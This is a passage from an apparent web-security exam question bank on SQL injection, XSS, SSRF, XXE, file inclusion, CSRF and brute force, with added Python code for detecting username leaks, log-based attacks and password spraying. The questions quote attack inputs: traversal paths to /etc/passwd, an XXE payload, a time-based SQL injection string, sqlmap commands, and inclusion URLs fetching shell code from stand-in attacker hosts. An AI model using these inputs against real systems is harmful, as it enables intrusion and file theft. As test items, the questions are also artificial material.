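    matched = hmac.compare_digest(stored, _hash(password))
    if matched and username in USERS:
        return 200, "OK"
    return 401, "Invalid credentials"


def leaks_username(login) -> bool:
    """Tester's oracle: does a wrong password produce a different response
    for an existing user than for a non-existent one? Against a live target
    the same comparison is made on status, body length and elapsed time."""
    return login("alice", "wrong") != login("nobody", "wrong")
```

The generic message alone fixes the text difference but not the timing one; the dummy hash is what equalises the two paths. Registration and password-reset forms leak the same information and need the same treatment.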

Question 83 (hard, multiple choice)

A web server is configured with WebDAV and allows PUT requests. An attacker uploads a .asp file and accesses it to execute code. Which tool or method is most directly associated with exploiting this misconfiguration?

Question 84 (medium, multiple choice)

A penetration tester uses a tool to intercept and modify HTTP/HTTPS requests in real-time between the browser and the web application. Which tool is being used?

Question 85 (medium, multiple choice)

An application is vulnerable to server-side request forgery (SSRF). An attacker exploits this to access internal services. Which of the following is a common indicator of SSRF?

Question 86 (easy, multiple choice)

Which of the following best describes the attack where an attacker uses a valid session token to impersonate a user without needing to authenticate?

Question 87 (hard, multi select)

A security analyst is reviewing a web application log and sees the following request: GET /page?file=../../../etc/passwd HTTP/1.1. Which TWO vulnerabilities are most likely being attempted? (Select two)
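
Questions 5, 57, 74 and 87 ask the analyst to recognise attacks from log lines. The following is an added example, not code from the question bank: a Python pass over constructed Apache-style access-log lines that percent-decodes the request path and matches it against signatures for traversal, command injection, SQL injection and XSS, keeping the status code so a 200 on a traversal path (the file was actually served) is distinguishable from a failed attempt. The log lines, IPs and timestamps are constructed.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (Apache common log format with size field).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2025:13:55:36 +0000] "GET /../../etc/passwd HTTP/1.1" 200 1432
203.0.113.5 - - [10/Oct/2025:13:55:40 +0000] "GET /cgi-bin/test.cgi?cmd=id HTTP/1.1" 200 88
198.51.100.9 - - [10/Oct/2025:13:56:01 +0000] "GET /page?file=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1432
198.51.100.9 - - [10/Oct/2025:13:56:10 +0000] "GET /products?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 500 0
192.0.2.7 - - [10/Oct/2025:13:57:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2210
192.0.2.7 - - [10/Oct/2025:13:57:05 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1" 200 3300
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)

# Signatures are matched against the percent-decoded request path.
SIGNATURES = [
    ("path_traversal", re.compile(r"\.\./|\.\.\\|/etc/passwd|\x00")),
    ("command_injection", re.compile(
        r"[?&](?:cmd|exec|command)=|[;|`$]\s*(?:id|whoami|uname|cat)\b")),
    ("sql_injection", re.compile(
        r"['\"]\s*(?:or|and)\s*['\"\d]|union\s+select|sleep\(|benchmark\(", re.I)),
    ("xss", re.compile(r"<script|javascript:|\son\w+\s*=", re.I)),
]


def classify(line: str):
    """Parse one log line and return the matching signature names.
    Status matters too: a 200 on a traversal path means the file was
    served (the /etc/passwd 200 of question 5), not merely requested."""
    m = LINE_RE.match(line)
    if not m:
        return None
    decoded = unquote(unquote(m["path"]))  # twice, to see through double encoding
    hits = [name for name, rx in SIGNATURES if rx.search(decoded)]
    return {"ip": m["ip"], "path": m["path"], "status": int(m["status"]),
            "hits": hits, "succeeded": m["status"] == "200"}


def suspicious_requests(log_text: str):
    """All parsed lines that hit at least one signature, in log order."""
    records = (classify(line) for line in log_text.splitlines())
    return [r for r in records if r and r["hits"]]
```

Signature matching like this is a triage aid, not proof: the decisive evidence for question 87's line is the response size matching the real /etc/passwd and the 200 status, and POST bodies (where most injection lands) are not in the access log at all.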

Question 88 (medium, multi select)

Which THREE of the following are common types of SQL injection attacks? (Select three)

Question 89 (medium, multi select)

An application uses the SameSite cookie attribute. Which TWO of the following are valid values for this attribute and their purposes? (Select two)

Question 90 (hard, multi select)

During a penetration test, a tester observes that a web application's login form does not implement rate limiting and returns different error messages for valid vs invalid usernames. Which THREE attacks are most likely to be successful? (Select three)
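
Questions 11, 22, 29, 35, 59, 75, 90 and 100 cover brute force, credential stuffing and password spraying and their indicators and mitigations. The following is an added example, not code from the question bank: a Python detector that classifies source addresses from constructed authentication events (many failures against one account versus one failure each across many accounts), and the per-key throttle a login form can apply. All events, addresses and thresholds are constructed.

```python
from collections import defaultdict


def build_events():
    """Constructed authentication events: (time_s, source_ip, username, outcome).

    203.0.113.5  tries 40 passwords for 'admin' in 40 seconds (brute force);
    198.51.100.9 tries one password each for 30 accounts (password spraying,
                 which stays under a per-account lockout threshold);
    192.0.2.7    is a user who mistypes once and then signs in.
    """
    events = [(t, "203.0.113.5", "admin", "fail") for t in range(40)]
    events += [(t, "198.51.100.9", f"user{t:02d}", "fail") for t in range(30)]
    events += [(5, "192.0.2.7", "alice", "fail"), (9, "192.0.2.7", "alice", "success")]
    return events


def detect(events, window_s=60, fail_threshold=10, spray_min_users=15):
    """Classify each source IP from its failed logins inside a sliding window.

    brute_force:    >= fail_threshold failures against few accounts
    password_spray: >= fail_threshold failures spread over >= spray_min_users
                    distinct accounts (the per-account counters a lockout
                    policy watches never trip; the per-source counter does)
    Credential stuffing looks like spraying with a success rate; it is
    caught by the same per-source view plus breach-list password checks.
    """
    failures = defaultdict(list)
    for ts, ip, user, outcome in sorted(events):
        if outcome == "fail":
            failures[ip].append((ts, user))

    verdicts = {}
    for ip, fails in failures.items():
        peak_failures = peak_users = 0
        start = 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window_s:
                start += 1
            chunk = fails[start:end + 1]
            peak_failures = max(peak_failures, len(chunk))
            peak_users = max(peak_users, len({u for _, u in chunk}))
        if peak_failures < fail_threshold:
            continue
        verdicts[ip] = ("password_spray" if peak_users >= spray_min_users
                        else "brute_force")
    return verdicts


def record_failure(history: dict, key: str, now: float) -> None:
    history.setdefault(key, []).append(now)


def allow_attempt(history: dict, key: str, now: float,
                  max_fails: int = 5, lock_s: int = 300) -> bool:
    """Throttle keyed by account *and* separately by source address: refuse
    once max_fails failures occurred within lock_s. Pair with MFA; an
    account lockout on its own lets an attacker lock out a known username."""
    recent = [t for t in history.get(key, []) if now - t < lock_s]
    history[key] = recent
    return len(recent) < max_fails
```

Question 90's form, with no throttle and a username oracle, is vulnerable to all three: the oracle tells the attacker which accounts exist, and the missing limit lets them work through passwords for each.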

Question 91mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security analyst notices that a web application returns different error messages for valid and invalid usernames during login. Which type of attack is this application MOST vulnerable to?

Question 92mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a penetration test, you identify a parameter in a web application that appears to fetch a file from the server. You modify the parameter to '../../../etc/passwd' and see the contents of the passwd file. Which type of vulnerability is this?

Question 93easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is the BEST defense against Cross-Site Request Forgery (CSRF) attacks?

Question 94mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application allows users to submit feedback that is stored in a database and displayed to other users without proper sanitization. A tester inputs '<script>alert(1)</script>' and it executes when other users view the feedback. Which type of XSS is this?

Question 95hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page.php?id=1' --batch --dbs. Which database enumeration technique is SQLMap using by default?

Question 96mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A web server is found to have directory listing enabled for the /uploads folder. An attacker discovers a shell.php file uploaded earlier. Which attack is the attacker MOST likely to perform next?

Question 97mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A security team wants to test their web application for vulnerabilities. Which Burp Suite tool is BEST suited for automating attacks like brute-force or fuzzing?

Question 98hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application has an endpoint that takes a URL parameter and fetches content from that URL, returning it to the user. An attacker supplies 'file:///etc/passwd' and reads the server's passwd file. Which vulnerability is this?

Question 99easymultiple choice
Read the full Web Application and Injection Attacks explanation →

Which of the following is a primary defense against SQL injection attacks?

Question 100mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

An attacker performs a password spraying attack against a web application. Which of the following BEST describes this technique?

Question 101mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

A penetration tester finds that a web application includes files based on user input without proper validation. The tester supplies 'http://attacker.com/malicious.txt' and the application includes its content. Which vulnerability is this?

Question 102hardmultiple choice
Read the full Web Application and Injection Attacks explanation →

A web application uses an XML parser to process user-supplied XML documents. An attacker submits the following payload: <?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><root>&xxe;</root>. Which vulnerability is being exploited?

Question 103mediummulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are characteristics of a reflected Cross-Site Scripting (XSS) attack? (Select 2)

Question 104easymulti select
Read the full Web Application and Injection Attacks explanation →

Which TWO of the following are commonly used to mitigate SQL injection vulnerabilities? (Select 2)

Question 105hardmulti select
Read the full Web Application and Injection Attacks explanation →

Which THREE of the following are valid defenses against CSRF attacks? (Select 3)

Question 106mediummultiple choice
Read the full Web Application and Injection Attacks explanation →

During a web application penetration test, a security analyst intercepts a request using Burp Suite and notices the following parameter in the URL: /profile?user_id=123. By changing the user_id to 124, the analyst is able to view another user's profile. Which vulnerability is being exploited?

Question 107 (hard, multiple choice)

A security team discovers that their web application is vulnerable to a Server-Side Request Forgery (SSRF) attack. Which of the following is the MOST effective mitigation technique to prevent SSRF?

Question 108 (easy, multiple choice)

Which of the following tools is specifically designed to automate the exploitation of SQL injection vulnerabilities and retrieve data from databases?

Question 109 (medium, multiple choice)

A penetration tester identifies a web page that reflects user input in the response without proper encoding. The input is submitted via a GET parameter. Which type of cross-site scripting (XSS) is MOST likely present?

Question 110 (medium, multiple choice)

A security analyst is reviewing HTTP response headers and notices the following: Set-Cookie: sessionId=abc123; SameSite=Lax. What is the primary purpose of the SameSite attribute?

Question 111 (medium, multiple choice)

During a penetration test, you find a web application that includes files using a parameter like /index.php?page=about. When you change the parameter to /etc/passwd, the application returns the contents of the password file. Which vulnerability is present?

Question 112 (easy, multiple choice)

Which HTTP method is commonly used by WebDAV to upload files to a web server, and if misconfigured, could allow an attacker to upload malicious scripts?

Question 113 (hard, multiple choice)

A web application takes a URL from user input and fetches the content to display on the page. An attacker submits a URL pointing to an internal service like http://localhost:8080/admin. The server retrieves the internal resource and returns it. What is this attack?

Question 114 (easy, multiple choice)

Which of the following Burp Suite tools is used to automatically fuzz web application inputs and identify common vulnerabilities like SQL injection and XSS?

Question 115 (medium, multiple choice)

A penetration tester attempts a SQL injection on a login form and receives no error messages, but notices a delay in the server response when injecting ' OR SLEEP(5)--. Which type of SQL injection is this?

Question 116 (hard, multiple choice)

After a security incident, logs show repeated login attempts from different IP addresses using a list of common passwords against a single username. Which attack technique is being used?

Question 117 (medium, multiple choice)

A web application allows users to upload profile images. An attacker uploads a file named 'image.php.png' with malicious PHP code, and the server executes it as PHP. Which type of vulnerability is this?

Question 118 (medium, multi-select)

Which TWO of the following are effective defenses against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

Question 119 (hard, multi-select)

Which THREE of the following are types of SQL injection attacks? (Select 3)

Question 120 (easy, multi-select)

Which TWO of the following are common indicators of a command injection vulnerability? (Select 2)

Question 121 (medium, multiple choice)

A web application tester notices that the application reflects user input in the URL without proper encoding. The tester submits a payload <script>alert('xss')</script> in a search field and the script executes in the browser. Which type of XSS vulnerability is this MOST likely?

Question 122 (medium, multiple choice)

During a penetration test, a security analyst discovers that a web application uses sequential numeric identifiers in URLs (e.g., /profile?id=100). By modifying the id parameter, the analyst can access another user's profile data without authorization. Which vulnerability is being exploited?

Question 123 (easy, multiple choice)

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities in web applications?

Question 124 (hard, multiple choice)

An application allows users to upload XML files for processing. A tester uploads the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which attack is being performed?

Question 125 (medium, multiple choice)

A security analyst observes that a web application's login page responds with different HTTP status codes and response times for valid versus invalid usernames. This information leakage could be used to perform which type of authentication attack?

Question 126 (easy, multiple choice)

Which of the following is a primary defense mechanism against Cross-Site Request Forgery (CSRF) attacks?

Question 127 (medium, multiple choice)

A penetration tester uses Burp Suite Repeater to manually modify and resend HTTP requests to a web server. In which phase of the testing methodology is this tool most commonly employed?

Question 128 (hard, multiple choice)

While analyzing web server logs, an analyst finds the following entry: GET /../../../../etc/passwd HTTP/1.1 with a 200 OK response. Which vulnerability is indicated, and what is the MOST likely impact?

Question 129 (medium, multiple choice)

Which of the following describes a Server-Side Request Forgery (SSRF) attack?

Question 130 (easy, multiple choice)

A web application tester uses the following Burp Suite feature to automatically send multiple requests with different payloads to test for common vulnerabilities. Which feature is being used?

Question 131 (hard, multiple choice)

An attacker exploits a vulnerable parameter in a web application by submitting the following payload: http://target.com/page.php?file=http://evil.com/shell.txt. The server returns the contents of the remote file. This is an example of which type of attack?

Question 132 (medium, multiple choice)

A security analyst discovers that a web application's search box reflects user input without proper sanitization. However, the attacker must trick a victim into clicking a crafted link containing the malicious script. This vulnerability is classified as which type?

Question 133 (medium, multi-select)

A penetration tester is assessing a web application and wants to manually test for SQL injection vulnerabilities. Which TWO tools or techniques are best suited for this task?

Question 134 (hard, multi-select)

Which THREE of the following are effective mitigation techniques against Cross-Site Scripting (XSS) attacks?

Question 135 (easy, multi-select)

Which TWO of the following are common types of SQL injection attacks?

Question 136 (hard, multiple choice)

An analyst reviews a web server log and sees the following request: GET /search?q=<script>alert('xss')</script> HTTP/1.1. The response from the server includes the search term inside a <div> tag without any sanitization. Which type of XSS vulnerability does this indicate?

Question 137 (medium, multiple choice)

A penetration tester uses SQLMap with the following command: sqlmap -u 'http://target.com/page?id=1' --batch --dbs. Which of the following best describes what this command will do?

Question 138 (easy, multiple choice)

An attacker attempts to exploit a web application by sending a request that triggers the server to make an internal HTTP request to a sensitive internal service. Which type of attack is this?

Question 139 (medium, multiple choice)

A security analyst notices that a web application uses sequential numeric IDs for user accounts (e.g., /profile?id=1001). By changing the ID to 1002, the analyst can view another user's profile. Which vulnerability is present?

Question 140 (medium, multiple choice)

During a web application penetration test, a tester uses Burp Suite's Intruder tool to automate a series of login attempts using a list of common passwords. Which attack type is being performed?

Question 141 (hard, multiple choice)

An analyst reviews the following HTTP response: HTTP/1.1 200 OK Set-Cookie: sessionid=abc123; SameSite=None; Secure ... <html><body><p>Welcome back!</p></body></html>. What possible vulnerability exists if the application does not use CSRF tokens?

Question 142 (medium, multiple choice)

Which of the following is the most effective defense against SQL injection attacks?

Question 143 (easy, multiple choice)

An attacker exploits an application by uploading a file that contains server-side script code, leading to arbitrary command execution on the web server. Which best describes this attack?

Question 144 (hard, multiple choice)

A security engineer observes that an internal web application uses XML to transmit data between systems. The engineer discovers that by sending a crafted XML payload, they can read sensitive files from the server's filesystem. Which attack is being performed?

Question 145 (easy, multiple choice)

Which Burp Suite tool is specifically designed to intercept and modify HTTP(S) traffic between the browser and the target web application?

Question 146 (medium, multiple choice)

A web application allows users to submit feedback that is stored in a database and later displayed to administrators. An attacker submits feedback containing <script>alert('stored')</script>. When an admin views the feedback page, the script executes. Which type of XSS is this?

Question 147 (medium, multiple choice)

An attacker uses the following URL pattern to access files: http://example.com/../../etc/passwd. Which attack is being attempted?

Question 148 (medium, multi-select)

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF) attacks? (Select 2)

Question 149 (hard, multi-select)

Which THREE of the following are common indicators of a Server-Side Request Forgery (SSRF) vulnerability? (Select 3)

Question 150 (easy, multi-select)

Which TWO of the following are common methods to detect SQL injection vulnerabilities in a web application? (Select 2)

Question 151 (medium, multiple choice)

A security analyst observes a web application returning database error messages containing table names and column names in the HTTP response. Which type of SQL injection is MOST likely being exploited?

Question 152 (medium, multiple choice)

During a web application test, a penetration tester intercepts a request using Burp Suite Proxy, modifies the 'Referer' header, and resends the request. The application processes the request despite the modified header. Which attack is the tester attempting to validate?

Question 153 (easy, multiple choice)

A web application allows users to view documents by specifying a filename in the URL, e.g., /getDocument?file=report.pdf. A tester changes the file parameter to '../../etc/passwd' and retrieves the system password file. Which vulnerability is being exploited?

Question 154 (hard, multiple choice)

A penetration tester uses SQLMap with the option '--technique=T --dbms=MySQL --level=5 --risk=3' against a login form. The tool returns results after a delay of several seconds per request. Which SQL injection technique is being used?

Question 155 (medium, multiple choice)

A security team deployed a web application firewall (WAF) that blocks requests containing SQL keywords like 'SELECT', 'UNION', and 'DROP'. An attacker bypasses the WAF by encoding the payload in base64 and using a SQL injection tool that decodes it server-side. Which mitigation would be MOST effective against this?

Question 156 (easy, multiple choice)

Which Burp Suite tool is specifically designed to automate customized attacks against web applications, such as brute-forcing login credentials or fuzzing parameters?

Question 157 (medium, multiple choice)

A penetration tester discovers that a web application's login page does not enforce rate limiting and several usernames are known from a prior data breach. The tester wants to try a few common passwords across many accounts to avoid account lockouts. Which attack technique is being used?

Question 158 (hard, multiple choice)

A web server running IIS 8.5 is found to have WebDAV enabled with write permissions. Which attack is MOST likely to be successful against this configuration?

Question 159 (easy, multiple choice)

An attacker crafts a link that, when clicked by an authenticated user, performs an unintended action on a web application where the user is logged in, such as changing their email address. The application uses a session cookie for authentication but does not include any anti-forgery tokens in forms. Which attack is this?

Question 160 (medium, multi-select)

A security analyst identifies that a web application is vulnerable to Server-Side Request Forgery (SSRF). Which TWO of the following are effective mitigation techniques for SSRF?

Question 161 (medium, multi-select)

During a penetration test, a tester finds a web application that reflects user input in the page without sanitization. Which TWO types of XSS are potentially exploitable in this scenario?

Question 162 (medium, multi-select)

An attacker is attempting to perform an Insecure Direct Object Reference (IDOR) attack on a web application. Which TWO conditions are necessary for this attack to succeed?

Question 163 (hard, multi-select)

A pentester uses Burp Suite's Intruder to perform a brute-force attack on a login form. Which THREE of the following Intruder attack types would be appropriate for testing different payload combinations?

Question 164 (easy, multi-select)

A web application is vulnerable to XML External Entity (XXE) injection. Which THREE of the following are potential impacts of successfully exploiting an XXE vulnerability?

Question 165 (hard, multi-select)

A penetration tester is performing a check for HTTP response splitting. Which THREE of the following conditions must be present for this attack to succeed?

Question 166 (medium, multi-select)

A security analyst notices that a web application's search functionality returns database error messages in the response. The analyst suspects SQL injection. Which TWO techniques should the analyst use to confirm and exploit this vulnerability? (Choose TWO.)

Question 167 (medium, multi-select)

During a web application penetration test, a tester discovers a file inclusion vulnerability. Which THREE of the following are potential impacts or exploitation scenarios? (Choose THREE.)

Question 168 (hard, multi-select)

A security engineer is reviewing web server logs and finds the following request: GET /files/../../../etc/passwd HTTP/1.1. Which THREE attacks could be associated with this request? (Choose THREE.)

Question 169 (medium, multi-select)

A penetration tester uses Burp Suite to intercept and modify web traffic. Which TWO features in Burp Suite would be MOST useful for performing a brute-force attack on a login form? (Choose TWO.)

Question 170 (hard, multi-select)

A web application uses cookies for session management. The application is vulnerable to CSRF. Which THREE of the following are effective mitigation techniques? (Choose THREE.)

Question 171 (easy, multi-select)

A web application tester encounters a parameter that is reflected in the response without sanitization. The tester suspects XSS. Which TWO types of XSS could be present in this scenario? (Choose TWO.)

Question 172 (medium, multi-select)

During a web application test, the tester finds that the application includes user-supplied file names in include() statements. Which TWO of the following are indicators of a Remote File Inclusion (RFI) vulnerability? (Choose TWO.)
